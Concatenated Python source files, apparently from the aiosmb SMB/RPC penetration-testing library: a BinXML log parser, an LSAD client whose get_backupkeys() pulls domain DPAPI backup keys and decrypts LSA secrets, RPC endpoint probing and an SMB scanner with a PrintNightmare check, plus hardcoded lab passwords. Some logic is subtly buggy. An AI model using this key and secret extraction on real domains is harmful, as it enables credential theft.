			v = parse_next(buff, (Element, StartElement, CloseStartElement, CloseEmptyElement, Substitution, EndElement, ValueText, EOF))
			td.Elements.append(v)
			if isinstance(v, EOF):
				break

		return td

class TemplateInstanceData:
	def __init__(self):
		self.ValueSpec = None
		self.Values = []
	
	@staticmethod
	def from_buffer(buff):
		tid = TemplateInstanceData()
		
		tid.ValueSpec = ValueSpec.from_buffer(buff)
		for vp in tid.ValueSpec.ValueSpecEntries:
			val = decode_val(buff.read(vp.ValueByteLength), vp.ValueType)
			tid.Values.append(val)

		return tid

class ValueSpec:
	def __init__(self):
		self.NumValues = None
		self.ValueSpecEntries = []

	@staticmethod
	def from_buffer(buff):
		vs = ValueSpec()
		vs.NumValues = int.from_bytes(buff.read(4), byteorder = 'little', signed=False)
		for _ in range(vs.NumValues):
			vs.ValueSpecEntries.append(ValueSpecEntry.from_buffer(buff))
		return vs

class ValueSpecEntry:
	def __init__(self):
		self.ValueByteLength = None
		self.ValueType = None

	@staticmethod
	def from_buffer(buff):
		vs = ValueSpecEntry()
		vs.ValueByteLength = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
		vs.ValueType = ValueType(buff.read(1))
		zero = buff.read(1)
		return vs

class Element:
	def __init__(self):
		self.StartElement = None
		self.Contents = []

	@staticmethod
	def from_buffer(buff):
		el = Element()
		el.StartElement = parse_next(buff, (StartElement,))

		t = parse_next(buff, (CloseStartElement, CloseEmptyElement))
		el.Contents.append(t)
		if isinstance(t, CloseEmptyElement): 
			return el
		
		while True:
			t = parse_next(buff, (CloseStartElement, CloseEmptyElement))
			el.Contents.append(t)
			if isinstance(t, EndElement):
				return el

		return el

## this class is bundled in with the Element class, no need for it separately
#class Content:
#	def __init__(self):
#		pass
#	
#	@staticmethod
#	def from_buffer(buff):
#		return parse_next(buff)


class CharData:
	def __init__(self):
		pass
	
	@staticmethod
	def from_buffer(buff):
		return parse_next(buff)

class StartElement:
	def __init__(self):
		self.OpenStartElementToken = None
		self.DependencyId = None
		self.ElementByteLength = None
		self.Name = None
		self.AttributeList = None

	def to_xml(self, subtable = None, is_empty = False):
		if self.AttributeList is None:
			return '<%s>' % (self.Name.value)
		else:
			t = '<%s ' % (self.Name.value)
			t += self.AttributeList.to_xml(subtable)
			t += '>' if is_empty is False else ' />'
		return t

	@staticmethod
	def from_buffer(buff):
		se = StartElement()
		se.OpenStartElementToken = buff.read(1)
		se.DependencyId = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
		se.ElementByteLength = int.from_bytes(buff.read(4), byteorder = 'little', signed=False)
		se.Name = Name.from_buffer(buff)
		if se.OpenStartElementToken == b'\x41':
			se.AttributeList = AttributeList.from_buffer(buff)
		return se

class Attribute:
	def __init__(self):
		self.AttributeToken = None
		self.Name = None
		self.AttributeCharData = None

	@staticmethod
	def from_buffer(buff):
		vt = Attribute()
		vt.AttributeToken = buff.read(1)
		vt.Name = Name.from_buffer(buff)
		vt.AttributeCharData = AttributeCharData.from_buffer(buff)
		return vt

class AttributeCharData:
	def __init__(self):
		self.AttributeToken = None
		self.value = None

	def to_xml(self, subtable = None):
		return self.value.to_xml(subtable)

	@staticmethod
	def from_buffer(buff):
		vt = AttributeCharData()
		vt.value = parse_next(buff)
		return vt

class AttributeList:
	def __init__(self):
		self.AttributeListByteLength = None
		self.Attributes = []

	def to_xml(self, subtable = None):
		t = []
		for attr in self.Attributes:
			t.append('%s="%s"' % (attr.Name.value, attr.AttributeCharData.to_xml(subtable)))
		return ' '.join(t)

	@staticmethod
	def from_buffer(buff):
		vt = AttributeList()
		vt.AttributeListByteLength = int.from_bytes(buff.read(4), byteorder = 'little', signed=False)
		pos = buff.tell() + vt.AttributeListByteLength
		while buff.tell() != pos :
			vt.Attributes.append(Attribute.from_buffer(buff))
		
		return vt

class ValueText:
	def __init__(self):
		self.ValueTextToken = None
		self.StringType = None
		self.value = None

	def to_xml(self, subtable = None):
		return self.value

	@staticmethod
	def from_buffer(buff):
		vt = ValueText()
		vt.ValueTextToken = buff.read(1)
		vt.StringType = buff.read(1)
		vt.value = read_LengthPrefixedUnicodeString(buff)
		return vt

class Substitution:
	def __init__(self):
		self.token = None
		self.SubstitutionId = None
		self.ValueType = None

		self.value = 'substitution'

	def to_xml(self, subtable = None):
		if self.ValueType == ValueType.BinXmlType:
			return subtable.Values[self.SubstitutionId].to_xml() #recursion much?!
		elif isinstance(subtable.Values[self.SubstitutionId], list):
			t = ''
			for x in subtable.Values[self.SubstitutionId]:
				if x == '':
					t += '<Data />'
				t += '<Data>%s</Data>' % x
			
			return t
		
		return str(subtable.Values[self.SubstitutionId])

		

	@staticmethod
	def from_buffer(buff):
		s = Substitution()
		s.token = buff.read(1)
		s.SubstitutionId = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
		s.ValueType = ValueType(buff.read(1))
		return s


class CharRef:
	def __init__(self):
		self.CharRefToken = None
		self.value = None

	@staticmethod
	def from_buffer(buff):
		er = CharRef()
		er.CharRefToken = buff.read(1)
		er.value = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
		return er

class EntityRef:
	def __init__(self):
		self.EntityRefToken = None
		self.Name = None

	@staticmethod
	def from_buffer(buff):
		er = EntityRef()
		er.EntityRefToken = buff.read(1)
		er.Name = Name.from_buffer(buff)
		return er

class CDATASection:
	def __init__(self):
		self.CDATASectionToken = None
		self.value = None

	@staticmethod
	def from_buffer(buff):
		cd = CDATASection()
		cd.CDATASectionToken = buff.read(1)
		cd.value = read_LengthPrefixedUnicodeString(buff)
		return cd

class PI:
	def __init__(self):
		self.PITarget = None
		self.PIData = None

	@staticmethod
	def from_buffer(buff):
		pi = PI()
		pi.PITarget = PITarget.from_buffer(buff)
		pi.PIData = Name.from_buffer(buff)
		return pi

class PIData:
	def __init__(self):
		self.PIDataToken = None
		self.value = None

	@staticmethod
	def from_buffer(buff):
		pid = PIData()
		pid.PIDataToken = buff.read(1)
		pid.value = read_LengthPrefixedUnicodeString(buff)
		return pid

class PITarget:
	def __init__(self):
		self.PITargetToken = None
		self.Name = None

	@staticmethod
	def from_buffer(buff):
		pit = PITarget()
		pit.PITargetToken = buff.read(1)
		pit.Name = Name.from_buffer(buff)
		return pit

class Name:
	def __init__(self):
		self.NameHash = None
		self.NameNumChars = None
		self.value = None

	@staticmethod
	def from_buffer(buff):
		n = Name()
		n.NameHash = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
		n.NameNumChars = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
		Name_val = buff.read((n.NameNumChars * 2) + 2)
		n.value = Name_val.decode('utf-16-le')[:-1]
		return n

class CloseStartElement:
	def __init__(self):
		self.token = None

	@staticmethod
	def from_buffer(buff):
		c = CloseStartElement()
		c.token = buff.read(1)
		return c

class CloseEmptyElement:
	def __init__(self):
		self.token = None

	@staticmethod
	def from_buffer(buff):
		c = CloseEmptyElement()
		c.token = buff.read(1)
		return c

class EndElement:
	def __init__(self):
		self.token = None

	@staticmethod
	def from_buffer(buff):
		c = EndElement()
		c.token = buff.read(1)
		return c

class EOF:
	def __init__(self):
		self.token = None
		self.value = None

	@staticmethod
	def from_buffer(buff):
		c = EOF()
		c.token = buff.read(1)
		return c


def peek_buffer(buff, length = 1):
	pos = buff.tell()
	data = buff.read(length)
	buff.seek(pos, 0)
	return data

def read_LengthPrefixedUnicodeString(buff):
	NumUnicodeChars = int.from_bytes(buff.read(2), byteorder = 'little', signed=False)
	StringValue = buff.read(NumUnicodeChars*2)
	return StringValue.decode('utf-16-le')

def parse_next(buff, expected = ()):
	t = token_node_lookup[peek_buffer(buff)].from_buffer(buff)
	if len(expected) == 0:
		return t
	if isinstance(t, expected):
		return t
	raise Exception('parse_next error! %s expected but %s found' % (expected, type(t)))

def decode_val(data, data_type):
	#print('decode_val %s : %s' % (data_type, data))
	if data_type == ValueType.NullType:
		return ''
	elif data_type == ValueType.StringType:
		return data.decode('utf-16-le')
	elif data_type == ValueType.AnsiStringType:
		return data.decode()
	elif data_type == ValueType.Int8Type:
		return int.from_bytes(data, byteorder = 'little', signed = True)
	elif data_type == ValueType.UInt8Type:
		return int.from_bytes(data, byteorder = 'little', signed = False)
	elif data_type == ValueType.Int16Type:
		return int.from_bytes(data, byteorder = 'little', signed = True)
	elif data_type == ValueType.UInt16Type:
		return int.from_bytes(data, byteorder = 'little', signed = False)
	elif data_type == ValueType.Int32Type:
		return int.from_bytes(data, byteorder = 'little', signed = True)
	elif data_type == ValueType.UInt32Type:
		return int.from_bytes(data, byteorder = 'little', signed = False)
	elif data_type == ValueType.Int64Type:
		return int.from_bytes(data, byteorder = 'little', signed = True)
	elif data_type == ValueType.UInt64Type:
		return int.from_bytes(data, byteorder = 'little', signed = False)
	elif data_type == ValueType.Real32Type:
		return struct.unpack('<f', data)
	elif data_type == ValueType.Real64Type:
		return struct.unpack('<d', data)
	elif data_type == ValueType.BoolType:
		return bool(int.from_bytes(data, byteorder = 'little', signed = False))
	elif data_type == ValueType.BinaryType:
		return data
	elif data_type == ValueType.GuidType:
		return GUID.from_bytes(data)
	elif data_type == ValueType.SizeTType:
		return '0x' + data[::-1].hex()
	elif data_type == ValueType.FileTimeType:
		return FILETIME.from_bytes(data).datetime.isoformat()
	elif data_type == ValueType.SysTimeType:
		return FILETIME.from_bytes(data).datetime.isoformat()
	elif data_type == ValueType.SidType:
		return SID.from_bytes(data)
	elif data_type == ValueType.HexInt32Type:
		return '0x' + data[::-1].hex()
	elif data_type == ValueType.HexInt64Type:
		return '0x' + data[::-1].hex()
	elif data_type == ValueType.BinXmlType:
		return Fragment.from_bytes(data)

	elif data_type == ValueType.StringArrayType:
		sa = []
		i = 0
		t = b''
		while i < len(data):
			t += data[i:i+1]
			if t[-3:] == b'\x00\x00\x00' or t == b'\x00\x00':
				sa.append(t.decode('utf-16-le')[:-1])
				t = b''
			i += 1
		return sa
	else:
		raise Exception('Unknown format! %s' % data_type)
	
	

token_node_lookup = {
	b'\x00' : EOF,
	b'\x01' : StartElement,
	b'\x41' : StartElement,
	b'\x02' : CloseStartElement,
	b'\x03' : CloseEmptyElement,
	b'\x04' : EndElement,
	b'\x05' : ValueText,
	b'\x45' : ValueText,
	b'\x06' : Attribute,
	b'\x46' : Attribute,
	b'\x07' : CDATASection,
	b'\x47' : CDATASection,
	b'\x08' : CharRef,
	b'\x48' : CharRef,
	b'\x09' : EntityRef,
	b'\x49' : EntityRef,
	b'\x0A' : PITarget,
	b'\x0B' : PIData,
	b'\x0C' : TemplateInstance,
	b'\x0D' : Substitution, #NormalSubstitution,
	b'\x0E' : Substitution, #OptionalSubstitution,
	b'\x0F' : FragmentHeader,
}

class ValueType(enum.Enum):
	NullType = b'\x00'
	StringType = b'\x01'
	AnsiStringType = b'\x02'
	Int8Type = b'\x03'
	UInt8Type = b'\x04'
	Int16Type = b'\x05'
	UInt16Type = b'\x06'
	Int32Type = b'\x07'
	UInt32Type = b'\x08'
	Int64Type = b'\x09'
	UInt64Type = b'\x0A'
	Real32Type = b'\x0B'
	Real64Type = b'\x0C'
	BoolType = b'\x0D'
	BinaryType = b'\x0E'
	GuidType = b'\x0F'
	SizeTType = b'\x10'
	FileTimeType = b'\x11'
	SysTimeType = b'\x12'
	SidType = b'\x13'
	HexInt32Type = b'\x14'
	HexInt64Type = b'\x15'
	BinXmlType = b'\x21'

	StringArrayType = b'\x81'
	AnsiStringArrayType = b'\x82'
	Int8ArrayType = b'\x83'
	UInt8ArrayType = b'\x84'
	Int16ArrayType = b'\x85'
	UInt16ArrayType = b'\x86'
	Int32ArrayType = b'\x87'
	UInt32ArrayType = b'\x88'
	Int64ArrayType = b'\x89'
	UInt64ArrayType = b'\x8A'
	Real32ArrayType = b'\x8B'
	Real64ArrayType = b'\x8C'
	BoolArrayType = b'\x8D'
	GuidArrayType = b'\x8F'
	SizeTArrayType = b'\x90'
	FileTimeArrayType = b'\x91'
	SysTimeArrayType = b'\x92'
	SidArrayType = b'\x93'
	HexInt32ArrayType = b'\x94' #also b'\x00'
	HexInt64ArrayType = b'\x95' #also b'\x00'



from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5 import lsad
from aiosmb.dcerpc.v5 import lsat
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb import logger
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5.uuid import bin_to_string
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE
from unicrypto.symmetric import cipherMODE, DES, expand_DES_key
from winacl.dtyp.wcee.backupkey import PREFERRED_BACKUP_KEY
from winacl.dtyp.wcee.pvkfile import PVKFile

class LSADRPC:
	def __init__(self):
		self.service_pipename = r'\lsarpc'
		self.service_uuid = lsat.MSRPC_UUID_LSAT
		self.dce = None
		self.handle = None
		
		self.policy_handles = {} #handle to sid
		self.ph_ctr = 0
		
	async def __aenter__(self):
		return self
	
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True, None
	
	async def close(self):		
		try:
			if self.dce:
				for hid in self.policy_handles:
					try:
						await lsad.hLsarClose(self.dce, self.policy_handles[hid])
					except:
						logger.exception()
						pass

				try:
					await self.dce.disconnect()
				except:
					pass
				return True, None
		except Exception as e:
			return None, e
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = LSADRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P
				#service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_NONE) #secure default :P

			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(LSADRPC().service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			rpctransport = SMBDCEFactory(connection, filename=LSADRPC().service_pipename)
			if auth_level is None:
				auth_level = RPC_C_AUTHN_LEVEL_NONE
			service, err = await LSADRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	
	async def open_policy2(self, permissions = MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES):
		try:
			resp, err = await lsad.hLsarOpenPolicy2(self.dce, permissions)
			if err is not None:
				raise err
			ph = resp['PolicyHandle']
			self.policy_handles[self.ph_ctr] = ph
			t = self.ph_ctr
			self.ph_ctr += 1
			return t, None
		except Exception as e:
			return None, e

	async def get_domain_sid(self, policy_handle):
		try:
			resp, err = await lsad.hLsarQueryInformationPolicy2(self.dce, self.policy_handles[policy_handle], lsad.POLICY_INFORMATION_CLASS.PolicyPrimaryDomainInformation)
			if err is not None:
				raise err
			domain_sid = resp['PolicyInformation']['PolicyPrimaryDomainInfo']['Sid'].formatCanonical()
			return domain_sid, None
		except Exception as e:
			return None, e

	async def get_host_sid(self, policy_handle):
		try:
			resp, err = await lsad.hLsarQueryInformationPolicy2(self.dce, self.policy_handles[policy_handle], lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)
			if err is not None:
				raise err
			host_sid = resp['PolicyInformation']['PolicyAccountDomainInfo']['DomainSid'].formatCanonical()
			return host_sid, None
		except Exception as e:
			return None, e

	async def lookup_sids(self, policy_handle, sids, lookup_level = lsat.LSAP_LOOKUP_LEVEL.enumItems.LsapLookupWksta):
		"""
		sids: list of string sid
		"""
		try:
			resp, err = await lsat.hLsarLookupSids(self.dce, self.policy_handles[policy_handle], sids, lookup_level)
			if err is not None:
				raise err
			if lookup_level == lsat.LSAP_LOOKUP_LEVEL.enumItems.LsapLookupWksta:
				domains = []
				for entry in resp['ReferencedDomains']['Domains']:
					domains.append(entry['Name'])

				for entry in resp['TranslatedNames']['Names']:
					domain = domains[entry['DomainIndex']]
					yield domain, entry['Name'], None
			else:
				yield resp, None
		except Exception as e:
			yield None, e
			return
		
	async def retrieve_private_data(self, policy_handle, key_name):
		try:
			resp, err = await lsad.hLsarRetrievePrivateData(self.dce, self.policy_handles[policy_handle], key_name)
			if err is not None:
				return None, err
			secret = self.decrypt_secret(resp)
			return secret, None
		except Exception as e:
			return None, e
	
	async def open_secret(self, policy_handle, secret_name):
		resp, err = await lsad.hLsarOpenSecret(self.dce, self.policy_handles[policy_handle], secret_name)
		if err is not None:
			return None, err
		return resp['SecretHandle'], err

	async def query_secret(self, secret_handle):
		resp, err = await lsad.hLsarQuerySecret(self.dce, secret_handle)
		if err is not None:
			return None, err
		enc_secret = b''.join(resp['EncryptedCurrentValue']['Buffer'])
		secret = self.decrypt_secret(enc_secret)
		return secret, err

	async def get_backupkeys(self):
		try:
			ph, err = await self.open_policy2(lsad.POLICY_GET_PRIVATE_INFORMATION)
			if err is not None:
				raise err
			
			results = {}
			for keyname in ['G$BCKUPKEY_PREFERRED', 'G$BCKUPKEY_P']:
				res = {}
				guid_bytes, err = await self.retrieve_private_data(ph, keyname)
				if err is not None:
					raise err
				
				guid = 'G$BCKUPKEY_%s' % bin_to_string(guid_bytes)
				keystruct, err = await self.retrieve_private_data(ph, guid)
				if err is not None:
					raise err

				keyversion = int.from_bytes(keystruct[:4], byteorder='little', signed = False)
				if keyversion == 1:
					keydata = keystruct[4:]
					res['legacykey'] = keydata
				elif keyversion == 2:
					pbk = PREFERRED_BACKUP_KEY.from_bytes(keystruct)
					pvk = PVKFile.construct_unencrypted('RSA2', pbk.keydata)
					certificate = pbk.certdata
					res['pvk'] = pvk
					res['certificate'] = certificate

				results[guid] = res
			
			return results, None
			
		except Exception as e:
			return None, e

	def decrypt_secret(self, encdata):
		# [MS-LSAD] Section 5.1.2
		# taken from impacket
		key = self.dce.get_session_key()
		decdata = b''
		key0 = key
		for _ in range(0, len(encdata), 8):
			chunk = encdata[:8]
			tkey = expand_DES_key(key0[:7]) #transformkey
			ctx = DES(tkey, cipherMODE.ECB)
			decdata += ctx.decrypt(chunk)
			key0 = key0[7:]
			encdata = encdata[8:]
			if len(key0) < 7:
				key0 = key[len(key0):]
		secret = lsad.LSA_SECRET_XP(decdata)
		return secret['Secret']


async def amain(url):
	enc_des = """
	e80089d6f0b1f19e
	c669ca27496f2fc1
	77304427d10d993c
	"""
	dec_des = """
	1000000001000000 
	0503fa2ece589243
	a8117ee5881c8c25
	"""

	import traceback
	import hashlib
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	from aiosmb.commons.interfaces.machine import SMBMachine
	from aiosmb.wintypes.dtyp.constrcuted_security.guid import GUID

	url = SMBConnectionFactory.from_url(url)
	connection = url.get_connection()
	_, err = await connection.login()
	if err is not None:
		print(err)
		raise err
	
	print('SMB Connected!')
	
	b = None
	try:
		b, err = await LSADRPC.from_smbconnection(connection)
		if err is not None:
			print(err)
			print(traceback.format_tb(err.__traceback__))
			return
		
		keys, err = await b.get_backupkeys()
		if err is not None:
			raise err
		
		print(keys)

	except:
		traceback.print_exc()
		if b is not None:
			await b.close()



if __name__ == '__main__':
	import asyncio
	#url = 'smb3+kerberos-password://TEST\\Administrator:Passw0rd!1@win2019ad.test.corp/?dc=10.10.10.2'
	url = 'smb2+ntlm-password://TEST\\dadmin:Passw0rd!1alma@win2019ad.test.corp/?dc=10.10.10.2'
	#url = 'smb2+ntlm-password://TEST\\victim:Passw0rd!1@10.10.10.2'
	asyncio.run(amain(url))



import traceback
from asyauth.common.constants import asyauthSecret
from asyauth.common.credentials.spnego import SPNEGOCredential
from asyauth.common.credentials.ntlm import NTLMCredential
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.epm import KNOWN_UUIDS, KNOWN_PROTOCOLS
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin, generate, stringver_to_bin, bin_to_uuidtup, bin_to_string
from aiosmb.dcerpc.v5.common.connection.authentication import DCERPCAuth
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE
from aiosmb.dcerpc.v5.ndr import NDRCALL

class DummyOp(NDRCALL):
	opnum = 255
	structure = ()

async def amain():
	try:
		targets = []
		ip = '10.10.10.2'
		epm = EPM.from_address(ip)
		_, err = await epm.connect()
		if err is not None:
			raise err

		x, err = await epm.lookup()
		if err is not None:
			raise err
		
		await epm.disconnect()
		print(len(x))
		
		#print(x)
		for entry in x:
			version = '%s.%s' % (entry['tower']['Floors'][0]['MajorVersion'], entry['tower']['Floors'][0]['MinorVersion'])
			uuidstr = bin_to_string(entry['tower']['Floors'][0]['InterfaceUUID'])
			service_uuid = uuidtup_to_bin((uuidstr, version))
			#print(entry['tower']['Floors'][0]['InterfaceUUID'])
			#print(version)
			#print(service_uuid)
			

			target, err = await EPM.create_target(ip, service_uuid)
			print(err)
			
			if err is not None:
				if str(err).find('ept_s_not_registered') != -1:
					continue
				raise err
			
			targets.append((uuidstr, service_uuid, target))
		
		for uuidstr, service_uuid, target in targets:
			#print('UUID: %s' % uuidstr)
			#print('Target: %s' % target)
			cred = NTLMCredential(
				username = 'Administrator', 
				domain = 'TEST', 
				secret = 'Passw0rd!1', 
				stype = asyauthSecret.PASSWORD, 
			)

			gssapi = SPNEGOCredential([cred]).build_context()
			auth = DCERPCAuth.from_smb_gssapi(gssapi)
			connection = DCERPC5Connection(auth, target)
			connection.set_auth_level(RPC_C_AUTHN_LEVEL_CONNECT)
			try:
				_, err = await connection.connect()
				if err is not None:
					raise err

				_, err = await connection.bind(service_uuid)
				if err is not None:
					raise err
				
				req = DummyOp()
				_, err = await connection.request(req)
				if str(err).find('rpc_s_access_denied') == -1:
					proto = 'UNK'
					if uuidstr in KNOWN_PROTOCOLS:
						proto = KNOWN_PROTOCOLS[uuidstr]
					print('UUID : %s' % uuidstr)
					print('proto: %s' % proto)
					print('err  : %s' % err)
					print()
			except Exception as e:
				traceback.print_exc()
			finally:
				await connection.disconnect()


	except Exception as e:
		traceback.print_exc()

if __name__ == '__main__':
	import asyncio
	asyncio.run(amain())



import asyncio
import logging
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.examples.scanners.smbfinger import SMBFingerScanner
from aiosmb.examples.scanners.smbiface import SMBInterfaceScanner
from aiosmb.examples.scanners.smbproto import SMBProtocolScanner
from aiosmb.examples.scanners.smbadmin import SMBAdminScanner
from aiosmb.examples.scanners.smbsession import SMBSessionScanner
from aiosmb.examples.scanners.smbprintnightmare import SMBPrintnightmareScanner
from aiosmb.examples.scanners.smbfile import SMBFileScanner

smbscan_options = {
	'finger'    : (SMBFingerScanner, "SMB Finger grabs OS info. Only works with NTLM auth"),
	'interface' : (SMBInterfaceScanner, "Lists available interfaces on the remote hosts"),
	'scantype'  : (SMBProtocolScanner, "SMB protocol version and NTLM signing checker"),
	'admin'     : (SMBAdminScanner, "Checks if giver user is admin on the remote hosts"),
	'session'   : (SMBSessionScanner, "Lists SMB sessions"),
	'printnightmare': (SMBPrintnightmareScanner, "Checks hosts for printnightmare vulnerability"),
	'file' : (SMBFileScanner, 'Enumerates files and shares')
}

async def amain():
	import argparse
	from asysocks.unicomm.common.scanner.targetgen import UniTargetGen
	from asysocks.unicomm.common.scanner.scanner import UniScanner
	from aiosmb import logger

	scannertpes_usage = '\r\nall: Runs all scanners\r\n'
	for k in smbscan_options:
		scannertpes_usage += '%s: %s\r\n' % (k, smbscan_options[k][1])
	usage = """
Scanner types (-s param):
	%s
"""% (scannertpes_usage,)

	parser = argparse.ArgumentParser(description='SMB Scanner', usage=usage)
	parser.add_argument('-w', '--worker-count', type=int, default=100, help='Parallell count')
	parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout for each connection')
	parser.add_argument('--no-progress', action='store_false', help='Disable progress bar')
	parser.add_argument('-o', '--out-file', help='Output file path.')
	parser.add_argument('-s', '--scan', nargs='+', required=True, help='Scanner type')
	parser.add_argument('-e', '--errors', action='store_true', help='Includes errors in output.')
	parser.add_argument('-d', '--depth', type=int, default=6, help='Share enumeration depth.')
	parser.add_argument('url', help = 'Connection string in URL format')
	parser.add_argument('targets', nargs='*', help = 'Hostname or IP address or file with a list of targets')
	args = parser.parse_args()

	if len(args.targets) == 0:
		print('No targets defined!')
		return
	
	logger.setLevel(logging.CRITICAL)
	
	connectionfactory = SMBConnectionFactory.from_url(args.url)
	scantypes = []
	for x in args.scan:
		scantypes.append(x.lower())
	executors = []
	if 'all' in scantypes:
		for k in smbscan_options:
			if k == 'file':
				executors.append(smbscan_options[k][0](connectionfactory, depth=args.depth))
				continue
			executors.append(smbscan_options[k][0](connectionfactory))
	else:
		for scantype in scantypes:
			if scantype not in smbscan_options:
				print('Unknown scan type: "%s"' % scantype)
				return
			if k == 'file':
				executors.append(smbscan_options[k][0](connectionfactory, depth=args.depth))
				continue
			executors.append(smbscan_options[scantype][0](connectionfactory))
			
	timeout = args.timeout
	if 'file' in scantypes:
		timeout = None
		
	tgen = UniTargetGen.from_list(args.targets)
	scanner = UniScanner('SMBScanner', executors, [tgen], worker_count=args.worker_count, host_timeout=timeout)
	await scanner.scan_and_process(progress=args.no_progress, out_file=args.out_file, include_errors=args.errors)

def main():
	asyncio.run(amain())

if __name__ == '__main__':
	main()



import fnmatch
import asyncio
import ntpath
import os


from aiosmb import logger
from aiosmb.commons.interfaces.share import SMBShare
from aiosmb.commons.interfaces.session import SMBUserSession
from aiosmb.commons.interfaces.file import SMBFile
from aiosmb.commons.interfaces.directory import SMBDirectory
from aiosmb.commons.utils.cpasswd import find_cpasswd

from aiosmb.dcerpc.v5.interfaces.srvsmgr import SRVSRPC
from aiosmb.dcerpc.v5.interfaces.samrmgr import SAMRRPC
from aiosmb.dcerpc.v5.interfaces.lsatmgr import LSADRPC
from aiosmb.dcerpc.v5.interfaces.drsuapimgr import DRSUAPIRPC
from aiosmb.dcerpc.v5.interfaces.servicemanager import REMSVCRPC
from aiosmb.dcerpc.v5.interfaces.remoteregistry import RRPRPC
from aiosmb.dcerpc.v5.interfaces.rprnmgr import RPRNRPC
from aiosmb.dcerpc.v5.interfaces.tschmgr import TSCHRPC
from aiosmb.dcerpc.v5.interfaces.parmgr import PARRPC
from aiosmb.dcerpc.v5.interfaces.wkstmgr import WKSTRPC
from aiosmb.dcerpc.v5.dtypes import RPC_SID


from aiosmb.dcerpc.v5 import tsch, scmr

from aiosmb.commons.exceptions import SMBMachineException

from aiosmb.commons.interfaces.blocking.file.file import SMBBlockingFileMgr
from aiosmb.commons.interfaces.blocking.file.blockingfile import SMBBlockingFile
from aiosmb.protocol.smb2.commands.ioctl import CtlCode, IOCTLREQFlags

from aiosmb.dcerpc.v5.rprn import PRINTER_CHANGE_ADD_JOB

class SMBMachine:
	def __init__(self, connection, print_cb = None, force_rpc_auth = None):
		self.connection = connection
		self.print_cb = print_cb
		self.force_rpc_auth = force_rpc_auth
		self.services = []
		self.shares = []
		self.localgroups = []
		self.sessions = []
		self.domains = []

		self.privtable = {}
		self.blocking_mgr_tasks = {}

		self.named_rpcs = {}
		self.named_rpcs_proto = {
			'SRVS' : SRVSRPC,
			'SAMR' : SAMRRPC,
			'LSAD' : LSADRPC,
			'RRP'  : RRPRPC,
			'RPRN' : RPRNRPC,
			'TSCH' : TSCHRPC,
			'PAR'  : PARRPC,
			'SERVICEMGR' : REMSVCRPC,
			'WKST' : WKSTRPC,
		}

		self.open_rpcs = {}


	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		try:
			await asyncio.wait_for(self.close(), timeout = 5)
		except:
			pass

	async def close(self):
		for name in self.open_rpcs:
			await self.named_rpcs[name].close()
		self.open_rpcs = {}


	def get_blocking_file(self):
		"""
		Please don't ever use this
		Starts a file manager task and initializes the io queues
		"""
		raise DeprecationWarning()
		#in_q = AsyncProcessQueue()
		#out_q = AsyncProcessQueue()
		#fsm = SMBBlockingFileMgr(self.connection, in_q, out_q)
		#fsmt = asyncio.create_task(fsm.run())
		#self.blocking_mgr_tasks[fsmt] = 1
		#bfile = SMBBlockingFile(in_q, out_q)
		#return bfile

	async def connect_rpc(self, service_name, reconnect = False):
		try:
			if service_name not in self.named_rpcs_proto:
				raise Exception('Unknown service name : %s' % service_name)
			
			if service_name in self.open_rpcs and reconnect is False:
				#print('Tried to reopen service %s' % service_name)
				return True, None
			
			if service_name in ['PAR', 'RPRN','SRVS','SAMR','RRP','TSCH', 'LSAD', 'SERVICEMGR', 'WKST']: #new service interface
